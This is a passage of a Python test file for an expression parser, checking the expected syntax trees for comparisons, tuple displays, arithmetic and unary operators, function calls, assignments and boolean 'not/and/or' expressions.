check('''1 < y == 2''', Suite((Call('return', Call('and', Call('<', Const(1), Name('y')), Call('==', Name('y'), Const(2)))),)))
# Tuple display on the left-hand side of each comparison operator.
check('''(x, None) < y''', Suite((Call('return', Call('<', Call('tuple', Name('x'), Const(None)), Name('y'))),)))
check('''(x, None) > y''', Suite((Call('return', Call('>', Call('tuple', Name('x'), Const(None)), Name('y'))),)))
check('''(x, None) == y''', Suite((Call('return', Call('==', Call('tuple', Name('x'), Const(None)), Name('y'))),)))
check('''(x, None) >= y''', Suite((Call('return', Call('>=', Call('tuple', Name('x'), Const(None)), Name('y'))),)))
check('''(x, None) <= y''', Suite((Call('return', Call('<=', Call('tuple', Name('x'), Const(None)), Name('y'))),)))
check('''(x, None) != y''', Suite((Call('return', Call('!=', Call('tuple', Name('x'), Const(None)), Name('y'))),)))
check('''(x, None) in y''', Suite((Call('return', Call('in', Call('tuple', Name('x'), Const(None)), Name('y'))),)))
check('''(x, None) not in y''', Suite((Call('return', Call('not-in', Call('tuple', Name('x'), Const(None)), Name('y'))),)))
check('''(1, None) < y < 2''', Suite((Call('return', Call('and', Call('<', Call('tuple', Const(1), Const(None)), Name('y')), Call('<', Name('y'), Const(2)))),)))
check('''(1, None) < y == 2''', Suite((Call('return', Call('and', Call('<', Call('tuple', Const(1), Const(None)), Name('y')), Call('==', Name('y'), Const(2)))),)))
# Tuple display on the right-hand side.
check('''x < (y, None)''', Suite((Call('return', Call('<', Name('x'), Call('tuple', Name('y'), Const(None)))),)))
check('''x > (y, None)''', Suite((Call('return', Call('>', Name('x'), Call('tuple', Name('y'), Const(None)))),)))
check('''x == (y, None)''', Suite((Call('return', Call('==', Name('x'), Call('tuple', Name('y'), Const(None)))),)))
check('''x >= (y, None)''', Suite((Call('return', Call('>=', Name('x'), Call('tuple', Name('y'), Const(None)))),)))
check('''x <= (y, None)''', Suite((Call('return', Call('<=', Name('x'), Call('tuple', Name('y'), Const(None)))),)))
check('''x != (y, None)''', Suite((Call('return', Call('!=', Name('x'), Call('tuple', Name('y'), Const(None)))),)))
check('''x in (y, None)''', Suite((Call('return', Call('in', Name('x'), Call('tuple', Name('y'), Const(None)))),)))
check('''x not in (y, None)''', Suite((Call('return', Call('not-in', Name('x'), Call('tuple', Name('y'), Const(None)))),)))
check('''1 < (y, None) < 2''', Suite((Call('return', Call('and', Call('<', Const(1), Call('tuple', Name('y'), Const(None))), Call('<', Call('tuple', Name('y'), Const(None)), Const(2)))),)))
check('''1 < (y, None) == 2''', Suite((Call('return', Call('and', Call('<', Const(1), Call('tuple', Name('y'), Const(None))), Call('==', Call('tuple', Name('y'), Const(None)), Const(2)))),)))
check('''1 < y < (2, None)''', Suite((Call('return', Call('and', Call('<', Const(1), Name('y')), Call('<', Name('y'), Call('tuple', Const(2), Const(None))))),)))
check('''1 < y == (2, None)''', Suite((Call('return', Call('and', Call('<', Const(1), Name('y')), Call('==', Name('y'), Call('tuple', Const(2), Const(None))))),)))
# Tuple displays on both sides.
check('''(x, None) < (y, None)''', Suite((Call('return', Call('<', Call('tuple', Name('x'), Const(None)), Call('tuple', Name('y'), Const(None)))),)))
check('''(x, None) > (y, None)''', Suite((Call('return', Call('>', Call('tuple', Name('x'), Const(None)), Call('tuple', Name('y'), Const(None)))),)))
check('''(x, None) == (y, None)''', Suite((Call('return', Call('==', Call('tuple', Name('x'), Const(None)), Call('tuple', Name('y'), Const(None)))),)))
check('''(x, None) >= (y, None)''', Suite((Call('return', Call('>=', Call('tuple', Name('x'), Const(None)), Call('tuple', Name('y'), Const(None)))),)))
check('''(x, None) <= (y, None)''', Suite((Call('return', Call('<=', Call('tuple', Name('x'), Const(None)), Call('tuple', Name('y'), Const(None)))),)))
check('''(x, None) != (y, None)''', Suite((Call('return', Call('!=', Call('tuple', Name('x'), Const(None)), Call('tuple', Name('y'), Const(None)))),)))
check('''(x, None) in (y, None)''', Suite((Call('return', Call('in', Call('tuple', Name('x'), Const(None)), Call('tuple', Name('y'), Const(None)))),)))
check('''(x, None) not in (y, None)''', Suite((Call('return', Call('not-in', Call('tuple', Name('x'), Const(None)), Call('tuple', Name('y'), Const(None)))),)))
check('''(1, None) < (y, None) < 2''', Suite((Call('return', Call('and', Call('<', Call('tuple', Const(1), Const(None)), Call('tuple', Name('y'), Const(None))), Call('<', Call('tuple', Name('y'), Const(None)), Const(2)))),)))
check('''(1, None) < (y, None) == 2''', Suite((Call('return', Call('and', Call('<', Call('tuple', Const(1), Const(None)), Call('tuple', Name('y'), Const(None))), Call('==', Call('tuple', Name('y'), Const(None)), Const(2)))),)))
check('''(1, None) < y < (2, None)''', Suite((Call('return', Call('and', Call('<', Call('tuple', Const(1), Const(None)), Name('y')), Call('<', Name('y'), Call('tuple', Const(2), Const(None))))),)))
check('''(1, None) < y == (2, None)''', Suite((Call('return', Call('and', Call('<', Call('tuple', Const(1), Const(None)), Name('y')), Call('==', Name('y'), Call('tuple', Const(2), Const(None))))),)))
# --- Arithmetic operators -----------------------------------------------------
# Binary + - * / % // are left-associative: a op b op c nests as (a op b) op c.
# Unary +/- parse as 'u+' / 'u-' nodes and may stack.
# ** is right-associative (a ** b ** c nests as a ** (b ** c)) and binds
# tighter than unary ops here only via attribute access (see x.y**2 below).
check('''x + y''', Suite((Call('return', Call('+', Name('x'), Name('y'))),)))
check('''x + y + z''', Suite((Call('return', Call('+', Call('+', Name('x'), Name('y')), Name('z'))),)))
check('''x + y + z + w''', Suite((Call('return', Call('+', Call('+', Call('+', Name('x'), Name('y')), Name('z')), Name('w'))),)))
check('''x - y''', Suite((Call('return', Call('-', Name('x'), Name('y'))),)))
check('''x - y - z''', Suite((Call('return', Call('-', Call('-', Name('x'), Name('y')), Name('z'))),)))
check('''x - y - z - w''', Suite((Call('return', Call('-', Call('-', Call('-', Name('x'), Name('y')), Name('z')), Name('w'))),)))
check('''x - y + z - w''', Suite((Call('return', Call('-', Call('+', Call('-', Name('x'), Name('y')), Name('z')), Name('w'))),)))
check('''x * y''', Suite((Call('return', Call('*', Name('x'), Name('y'))),)))
check('''x * y * z''', Suite((Call('return', Call('*', Call('*', Name('x'), Name('y')), Name('z'))),)))
check('''x * y * z * w''', Suite((Call('return', Call('*', Call('*', Call('*', Name('x'), Name('y')), Name('z')), Name('w'))),)))
check('''x * y - z * w''', Suite((Call('return', Call('-', Call('*', Name('x'), Name('y')), Call('*', Name('z'), Name('w')))),)))
check('''x / y''', Suite((Call('return', Call('/', Name('x'), Name('y'))),)))
check('''x / y / z''', Suite((Call('return', Call('/', Call('/', Name('x'), Name('y')), Name('z'))),)))
check('''x / y / z / w''', Suite((Call('return', Call('/', Call('/', Call('/', Name('x'), Name('y')), Name('z')), Name('w'))),)))
check('''x / y * z / w''', Suite((Call('return', Call('/', Call('*', Call('/', Name('x'), Name('y')), Name('z')), Name('w'))),)))
check('''x % y''', Suite((Call('return', Call('%', Name('x'), Name('y'))),)))
check('''x % y % z''', Suite((Call('return', Call('%', Call('%', Name('x'), Name('y')), Name('z'))),)))
check('''x % y % z % w''', Suite((Call('return', Call('%', Call('%', Call('%', Name('x'), Name('y')), Name('z')), Name('w'))),)))
check('''x % y / z % w''', Suite((Call('return', Call('%', Call('/', Call('%', Name('x'), Name('y')), Name('z')), Name('w'))),)))
check('''x // y''', Suite((Call('return', Call('//', Name('x'), Name('y'))),)))
check('''x // y // z''', Suite((Call('return', Call('//', Call('//', Name('x'), Name('y')), Name('z'))),)))
check('''x // y // z // w''', Suite((Call('return', Call('//', Call('//', Call('//', Name('x'), Name('y')), Name('z')), Name('w'))),)))
check('''x // y % z // w''', Suite((Call('return', Call('//', Call('%', Call('//', Name('x'), Name('y')), Name('z')), Name('w'))),)))
# Unary operators, alone and stacked.
check('''+x''', Suite((Call('return', Call('u+', Name('x'))),)))
check('''-x''', Suite((Call('return', Call('u-', Name('x'))),)))
check('''++x''', Suite((Call('return', Call('u+', Call('u+', Name('x')))),)))
check('''+-x''', Suite((Call('return', Call('u+', Call('u-', Name('x')))),)))
check('''-+x''', Suite((Call('return', Call('u-', Call('u+', Name('x')))),)))
check('''--x''', Suite((Call('return', Call('u-', Call('u-', Name('x')))),)))
check('''+x + y''', Suite((Call('return', Call('+', Call('u+', Name('x')), Name('y'))),)))
check('''-x + y''', Suite((Call('return', Call('+', Call('u-', Name('x')), Name('y'))),)))
check('''++x + y''', Suite((Call('return', Call('+', Call('u+', Call('u+', Name('x'))), Name('y'))),)))
check('''+-x + y''', Suite((Call('return', Call('+', Call('u+', Call('u-', Name('x'))), Name('y'))),)))
check('''-+x + y''', Suite((Call('return', Call('+', Call('u-', Call('u+', Name('x'))), Name('y'))),)))
check('''--x + y''', Suite((Call('return', Call('+', Call('u-', Call('u-', Name('x'))), Name('y'))),)))
check('''x + +x''', Suite((Call('return', Call('+', Name('x'), Call('u+', Name('x')))),)))
check('''x + -x''', Suite((Call('return', Call('+', Name('x'), Call('u-', Name('x')))),)))
check('''x + ++x''', Suite((Call('return', Call('+', Name('x'), Call('u+', Call('u+', Name('x'))))),)))
check('''x + +-x''', Suite((Call('return', Call('+', Name('x'), Call('u+', Call('u-', Name('x'))))),)))
check('''x + -+x''', Suite((Call('return', Call('+', Name('x'), Call('u-', Call('u+', Name('x'))))),)))
check('''x + --x''', Suite((Call('return', Call('+', Name('x'), Call('u-', Call('u-', Name('x'))))),)))
# Power: right-associative; // binds looser than **.
check('''x ** y''', Suite((Call('return', Call('**', Name('x'), Name('y'))),)))
check('''x ** y ** z''', Suite((Call('return', Call('**', Name('x'), Call('**', Name('y'), Name('z')))),)))
check('''x ** y ** z ** w''', Suite((Call('return', Call('**', Name('x'), Call('**', Name('y'), Call('**', Name('z'), Name('w'))))),)))
check('''x ** y // z ** w''', Suite((Call('return', Call('//', Call('**', Name('x'), Name('y')), Call('**', Name('z'), Name('w')))),)))
# Attribute access ('.') binds tighter than **.
check('''x.y**2''', Suite((Call('return', Call('**', Call('.', Name('x'), 'y'), Const(2))),)))
# --- Calls and assignment statements -----------------------------------------
# Positional-only calls produce Call(callee, args...); any keyword argument
# switches the node to CallKeyword(callee, positional_tuple, kwarg_pairs).
# Assignment targets are a tuple; tuple targets wrap names in Unpack.
# A program whose last statement is not an expression returns Const(None).
check('f(None)', Suite((Call('return', Call(Name('f'), Const(None))),)))
check('f(x, None)', Suite((Call('return', Call(Name('f'), Name('x'), Const(None))),)))
check('f(x, y, None)', Suite((Call('return', Call(Name('f'), Name('x'), Name('y'), Const(None))),)))
check('f(x, y, z, None)', Suite((Call('return', Call(Name('f'), Name('x'), Name('y'), Name('z'), Const(None))),)))
check('f(x=1)', Suite((Call('return', CallKeyword(Name('f'), (), (('x', Const(1)),))),)))
check('f(x, y=1)', Suite((Call('return', CallKeyword(Name('f'), (Name('x'),), (('y', Const(1)),))),)))
check('f(x, y, z=1)', Suite((Call('return', CallKeyword(Name('f'), (Name('x'), Name('y'),), (('z', Const(1)),))),)))
# NOTE(review): a trailing bare Name expression does not become the program's
# return value here — the implicit Call('return', Const(None)) follows it.
check('x = 1; x', Suite((Assign((Name('x'),), Const(1)), Name('x'), Call('return', Const(None)),)))
check('x = 1; x;', Suite((Assign((Name('x'),), Const(1)), Name('x'), Call('return', Const(None)),)))
check('x, = 1; x', Suite((Assign((Unpack((Name('x'),)),), Const(1)), Name('x'), Call('return', Const(None)),)))
check('x, y = 1; x', Suite((Assign((Unpack((Name('x'), Name('y'))),), Const(1)), Name('x'), Call('return', Const(None)),)))
check('x, y, = 1; x', Suite((Assign((Unpack((Name('x'), Name('y'))),), Const(1)), Name('x'), Call('return', Const(None)),)))
check('x, y, z = 1; x', Suite((Assign((Unpack((Name('x'), Name('y'), Name('z'))),), Const(1)), Name('x'), Call('return', Const(None)),)))
check('x, y, z, = 1; x', Suite((Assign((Unpack((Name('x'), Name('y'), Name('z'))),), Const(1)), Name('x'), Call('return', Const(None)),)))
check("False", Suite((Call('return', Const(False)),)))
check("True", Suite((Call('return', Const(True)),)))
check("not x", Suite((Call('return', Call('not', Name('x'))),)))
check("not x and not y", Suite((Call('return', Call('and', Call('not', Name('x')), Call('not', Name('y')))),)))
check("not x and not y and not z", Suite((Call('return', Call('and', Call('not', Name('x')), Call('and', Call('not', Name('y')), Call('not', Name('z'))))),)))
check("not x and not y and not z", Suite((Call('return', Call('and', Call('not', Name('x')), Call('and', Call('not', Name('y')), Call('not', Name('z'))))),)))
check("not x and not y and not z", Suite((Call('return', Call('and', Call('not', Name('x')), Call('and', Call('not', Name('y')), Call('not', Name('z'))))),)))
check("not x or not y", Suite((Call('return', Call('or', Call('not', Name('x')), Call('not', Name('y')))),)))
check("not x or not y or not z", Suite((Call('return', Call('or', Call('not', Name('x')), Call('or', Call('not', Name('y')), Call('not', Name('z'))))),)))
check("not x or not y or not z", Suite((Call('return', Call('or', Call('not', Name('x')), Call('or', Call('not', Name('y')), Call('not', Name('z'))))),)))
check("not x or not y or not z", Suite((Call('return', Call('or', Call('not', Name('x')), Call('or', Call('not', Name('y')), Call('not', Name('z'))))),)))
check("(not x or not y, None) and not z", Suite((Call('return', Call('and', Call('tuple', Call('or', Call('not', Name('x')), Call('not', Name('y'))), Const(None)), Call('not', Name('z')))),)))
check("not x and (not y or not z, None)", Suite((Call('return', Call('and', Call('not', Name('x')), Call('tuple', Call('or', Call('not', Name('y')), Call('not', Name('z'))), Const(None)))),)))
check("not x(1, None)", Suite((Call('return', Call('not', Call(Name('x'), Const(1), Const(None)))),)))
check("not x(1, None) and not y(2, None)", Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('not', Call(Name('y'), Const(2), Const(None))))),)))
check("not x(1, None) and not y(2, None) and not z(3, None)", Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('and', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check("not x(1, None) and not y(2, None) and not z(3, None)", Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('and', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check("not x(1, None) and not y(2, None) and not z(3, None)", Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('and', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check("not x(1, None) or not y(2, None)", Suite((Call('return', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('not', Call(Name('y'), Const(2), Const(None))))),)))
check("not x(1, None) or not y(2, None) or not z(3, None)", Suite((Call('return', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('or', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check("not x(1, None) or not y(2, None) or not z(3, None)", Suite((Call('return', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('or', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check("not x(1, None) or not y(2, None) or not z(3, None)", Suite((Call('return', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('or', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check("(not x(1, None) or not y(2, None), None) and not z(3, None)", Suite((Call('return', Call('and', Call('tuple', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('not', Call(Name('y'), Const(2), Const(None)))), Const(None)), Call('not', Call(Name('z'), Const(3), Const(None))))),)))
check("not x(1, None) and (not y(2, None) or not z(3, None), None)", Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('tuple', Call('or', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))), Const(None)))),)))
check("not x.a", Suite((Call('return', Call('not', Call('.', Name('x'), 'a'))),)))
check("not x.a and not y.b", Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('not', Call('.', Name('y'), 'b')))),)))
check("not x.a and not y.b and not z.c", Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('and', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check("not x.a and not y.b and not z.c", Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('and', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check("not x.a and not y.b and not z.c", Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('and', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check("not x.a or not y.b", Suite((Call('return', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('not', Call('.', Name('y'), 'b')))),)))
check("not x.a or not y.b or not z.c", Suite((Call('return', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('or', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check("not x.a or not y.b or not z.c", Suite((Call('return', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('or', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check("not x.a or not y.b or not z.c", Suite((Call('return', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('or', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check("(not x.a or not y.b, None) and not z.c", Suite((Call('return', Call('and', Call('tuple', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('not', Call('.', Name('y'), 'b'))), Const(None)), Call('not', Call('.', Name('z'), 'c')))),)))
check("not x.a and (not y.b or not z.c, None)", Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('tuple', Call('or', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))), Const(None)))),)))
check("False", Suite((Call('return', Const(False)),)))
check("True", Suite((Call('return', Const(True)),)))
check("not x", Suite((Call('return', Call('not', Name('x'))),)))
check("not x and not y", Suite((Call('return', Call('and', Call('not', Name('x')), Call('not', Name('y')))),)))
check("not x and not y and not z", Suite((Call('return', Call('and', Call('not', Name('x')), Call('and', Call('not', Name('y')), Call('not', Name('z'))))),)))
check("not x and not y and not z", Suite((Call('return', Call('and', Call('not', Name('x')), Call('and', Call('not', Name('y')), Call('not', Name('z'))))),)))
check("not x and not y and not z", Suite((Call('return', Call('and', Call('not', Name('x')), Call('and', Call('not', Name('y')), Call('not', Name('z'))))),)))
check("not x or not y", Suite((Call('return', Call('or', Call('not', Name('x')), Call('not', Name('y')))),)))
check("not x or not y or not z", Suite((Call('return', Call('or', Call('not', Name('x')), Call('or', Call('not', Name('y')), Call('not', Name('z'))))),)))
check("not x or not y or not z", Suite((Call('return', Call('or', Call('not', Name('x')), Call('or', Call('not', Name('y')), Call('not', Name('z'))))),)))
check("not x or not y or not z", Suite((Call('return', Call('or', Call('not', Name('x')), Call('or', Call('not', Name('y')), Call('not', Name('z'))))),)))
check("(not x or not y, None) and not z", Suite((Call('return', Call('and', Call('tuple', Call('or', Call('not', Name('x')), Call('not', Name('y'))), Const(None)), Call('not', Name('z')))),)))
check("not x and (not y or not z, None)", Suite((Call('return', Call('and', Call('not', Name('x')), Call('tuple', Call('or', Call('not', Name('y')), Call('not', Name('z'))), Const(None)))),)))
check("not x(1, None)", Suite((Call('return', Call('not', Call(Name('x'), Const(1), Const(None)))),)))
check("not x(1, None) and not y(2, None)", Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('not', Call(Name('y'), Const(2), Const(None))))),)))
check("not x(1, None) and not y(2, None) and not z(3, None)", Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('and', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check("not x(1, None) and not y(2, None) and not z(3, None)", Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('and', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check("not x(1, None) and not y(2, None) and not z(3, None)", Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('and', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check("not x(1, None) or not y(2, None)", Suite((Call('return', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('not', Call(Name('y'), Const(2), Const(None))))),)))
check("not x(1, None) or not y(2, None) or not z(3, None)", Suite((Call('return', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('or', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check("not x(1, None) or not y(2, None) or not z(3, None)", Suite((Call('return', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('or', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check("not x(1, None) or not y(2, None) or not z(3, None)", Suite((Call('return', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('or', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check("(not x(1, None) or not y(2, None), None) and not z(3, None)", Suite((Call('return', Call('and', Call('tuple', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('not', Call(Name('y'), Const(2), Const(None)))), Const(None)), Call('not', Call(Name('z'), Const(3), Const(None))))),)))
check("not x(1, None) and (not y(2, None) or not z(3, None), None)", Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('tuple', Call('or', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))), Const(None)))),)))
check("not x.a", Suite((Call('return', Call('not', Call('.', Name('x'), 'a'))),)))
check("not x.a and not y.b", Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('not', Call('.', Name('y'), 'b')))),)))
check("not x.a and not y.b and not z.c", Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('and', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check("not x.a and not y.b and not z.c", Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('and', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check("not x.a and not y.b and not z.c", Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('and', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check("not x.a or not y.b", Suite((Call('return', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('not', Call('.', Name('y'), 'b')))),)))
check("not x.a or not y.b or not z.c", Suite((Call('return', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('or', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check("not x.a or not y.b or not z.c", Suite((Call('return', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('or', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check("not x.a or not y.b or not z.c", Suite((Call('return', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('or', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check("(not x.a or not y.b, None) and not z.c", Suite((Call('return', Call('and', Call('tuple', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('not', Call('.', Name('y'), 'b'))), Const(None)), Call('not', Call('.', Name('z'), 'c')))),)))
check("not x.a and (not y.b or not z.c, None)", Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('tuple', Call('or', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))), Const(None)))),)))
# --- Boolean logic with 'not' (triple-quoted sources) ------------------------
# Same family of checks again with the source strings written as
# triple-quoted literals; the parser output must be independent of how the
# test's source string is quoted.
check('''False''', Suite((Call('return', Const(False)),)))
check('''True''', Suite((Call('return', Const(True)),)))
check('''not x''', Suite((Call('return', Call('not', Name('x'))),)))
check('''not x and not y''', Suite((Call('return', Call('and', Call('not', Name('x')), Call('not', Name('y')))),)))
check('''not x and not y and not z''', Suite((Call('return', Call('and', Call('not', Name('x')), Call('and', Call('not', Name('y')), Call('not', Name('z'))))),)))
check('''not x and not y and not z''', Suite((Call('return', Call('and', Call('not', Name('x')), Call('and', Call('not', Name('y')), Call('not', Name('z'))))),)))
check('''not x and not y and not z''', Suite((Call('return', Call('and', Call('not', Name('x')), Call('and', Call('not', Name('y')), Call('not', Name('z'))))),)))
check('''not x or not y''', Suite((Call('return', Call('or', Call('not', Name('x')), Call('not', Name('y')))),)))
check('''not x or not y or not z''', Suite((Call('return', Call('or', Call('not', Name('x')), Call('or', Call('not', Name('y')), Call('not', Name('z'))))),)))
check('''not x or not y or not z''', Suite((Call('return', Call('or', Call('not', Name('x')), Call('or', Call('not', Name('y')), Call('not', Name('z'))))),)))
check('''not x or not y or not z''', Suite((Call('return', Call('or', Call('not', Name('x')), Call('or', Call('not', Name('y')), Call('not', Name('z'))))),)))
check('''(not x or not y, None) and not z''', Suite((Call('return', Call('and', Call('tuple', Call('or', Call('not', Name('x')), Call('not', Name('y'))), Const(None)), Call('not', Name('z')))),)))
check('''not x and (not y or not z, None)''', Suite((Call('return', Call('and', Call('not', Name('x')), Call('tuple', Call('or', Call('not', Name('y')), Call('not', Name('z'))), Const(None)))),)))
check('''not x(1, None)''', Suite((Call('return', Call('not', Call(Name('x'), Const(1), Const(None)))),)))
check('''not x(1, None) and not y(2, None)''', Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('not', Call(Name('y'), Const(2), Const(None))))),)))
check('''not x(1, None) and not y(2, None) and not z(3, None)''', Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('and', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check('''not x(1, None) and not y(2, None) and not z(3, None)''', Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('and', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check('''not x(1, None) and not y(2, None) and not z(3, None)''', Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('and', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check('''not x(1, None) or not y(2, None)''', Suite((Call('return', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('not', Call(Name('y'), Const(2), Const(None))))),)))
check('''not x(1, None) or not y(2, None) or not z(3, None)''', Suite((Call('return', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('or', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check('''not x(1, None) or not y(2, None) or not z(3, None)''', Suite((Call('return', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('or', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check('''not x(1, None) or not y(2, None) or not z(3, None)''', Suite((Call('return', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('or', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check('''(not x(1, None) or not y(2, None), None) and not z(3, None)''', Suite((Call('return', Call('and', Call('tuple', Call('or', Call('not', Call(Name('x'), Const(1), Const(None))), Call('not', Call(Name('y'), Const(2), Const(None)))), Const(None)), Call('not', Call(Name('z'), Const(3), Const(None))))),)))
check('''not x(1, None) and (not y(2, None) or not z(3, None), None)''', Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('tuple', Call('or', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))), Const(None)))),)))
check('''not x.a''', Suite((Call('return', Call('not', Call('.', Name('x'), 'a'))),)))
check('''not x.a and not y.b''', Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('not', Call('.', Name('y'), 'b')))),)))
check('''not x.a and not y.b and not z.c''', Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('and', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check('''not x.a and not y.b and not z.c''', Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('and', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check('''not x.a and not y.b and not z.c''', Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('and', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check('''not x.a or not y.b''', Suite((Call('return', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('not', Call('.', Name('y'), 'b')))),)))
check('''not x.a or not y.b or not z.c''', Suite((Call('return', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('or', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check('''not x.a or not y.b or not z.c''', Suite((Call('return', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('or', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
